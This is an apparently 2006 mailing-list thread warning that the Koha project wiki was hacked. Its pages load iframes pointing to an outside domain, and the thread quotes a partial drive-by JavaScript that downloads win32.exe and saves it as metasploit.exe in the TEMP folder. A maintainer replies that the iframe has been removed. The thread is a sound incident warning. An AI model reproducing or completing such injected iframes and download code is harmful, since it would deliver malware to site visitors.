[DANGER - URGENT - WARNING - URGENT] wiki.koha.org hacked
To everybody. http://wiki.koha.org has been hacked : when you try to open a page, something with a .wmf + a large javascript is loaded. If you go to the wiki under linux/Mac OSX, it is just impossible to use. If you go to the wiki under MS-windows, it's probably impossible to use + do some nasty things on your computer. SO, AVOID GOING TO WIKI.KOHA.ORG Kados / chris : it seems (with lynx, that don't enjoy javascript ;-) ) that all pages contains on the top an iframe to IFRAME: http://uniqcount.net/adv/new.php?adv=9 IFRAME: http://uniqcount.net/adv/09/new3.php going to this address give a page with javascript containing : ============================================ Log('Ceating the XMLHTTP object...'); var url = "http://uniqcount.net/adv/09/win32.exe"; var xml = null; var bin = e.Item("TEMP")+ "\\" + "metasploit.exe"; var dat; try { xml=new XMLHttpRequest(); } catch(e) { try { xml = new ActiveXObject("Microsoft.XMLHTTP"); } catch(e) { xml = new ActiveXObject("MSXML2.ServerXMLHTTP"); } =========================================== metasploit.exe is something really nasty : http://seclists.org/vuln-dev/2004/Apr/0011.html -- Paul POULAIN et Henri Damien LAURENT Consultants indépendants en logiciels libres et bibliothéconomie (http://www.koha-fr.org) Tel : 04 91 31 45 19
On Tue, Sep 26, 2006 at 06:45:23PM +0200, Paul POULAIN wrote:
To everybody.
http://wiki.koha.org has been hacked : when you try to open a page, something with a .wmf + a large javascript is loaded. Hi Paul,
Thanks for the heads up. The iframe has been removed from pages and I'm investigating the reason for the hack -- I suspect it's a vulnerability in dokuwiki's bin directory. I'll report back what I find. Cheers, -- Joshua Ferraro SUPPORT FOR OPEN-SOURCE SOFTWARE President, Technology migration, training, maintenance, support LibLime Featuring Koha Open-Source ILS jmf@liblime.com |Full Demos at http://liblime.com/koha |1(888)KohaILS
participants (2)
-
Joshua Ferraro -
Paul POULAIN